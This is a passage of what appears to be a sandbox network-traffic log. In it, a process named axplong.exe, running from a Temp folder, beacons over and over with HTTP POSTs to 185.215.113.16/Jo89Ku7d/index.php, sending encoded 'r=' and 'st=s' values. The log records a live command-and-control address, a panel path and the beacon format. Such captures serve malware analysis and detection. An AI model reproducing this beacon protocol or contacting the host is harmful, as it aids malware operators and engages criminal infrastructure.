Jul 26, 2024 20:58:23.058140039 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:23.315845966 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49728	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:23.423939943 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:24.226958990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:24.227797031 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:24.479841948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49729	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:24.596080065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:25.371866941 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:25.372769117 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:25.629643917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49730	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:25.736569881 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:26.518021107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:26.518990040 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:26.769520044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49731	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:26.877465010 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:27.681642056 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:27.682790041 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:27.965060949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49732	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:28.083575964 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:28.837975979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:28.838609934 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:29.086675882 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49733	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:29.437333107 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:30.214293957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:30.215038061 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:30.466254950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49734	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:30.580513954 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:31.535506010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:31.567679882 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:31.822416067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49735	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:32.140187979 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:33.206010103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:33.206834078 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:33.209753990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:33.457551003 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49736	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:33.597733021 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:34.359983921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:34.386220932 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:34.635875940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49737	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:34.752319098 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:35.517978907 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:35.518920898 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:35.767812967 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49738	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:35.877474070 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:36.679044008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:36.702434063 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:36.970082045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49739	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:37.112205982 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:38.321544886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:38.323770046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:38.324192047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
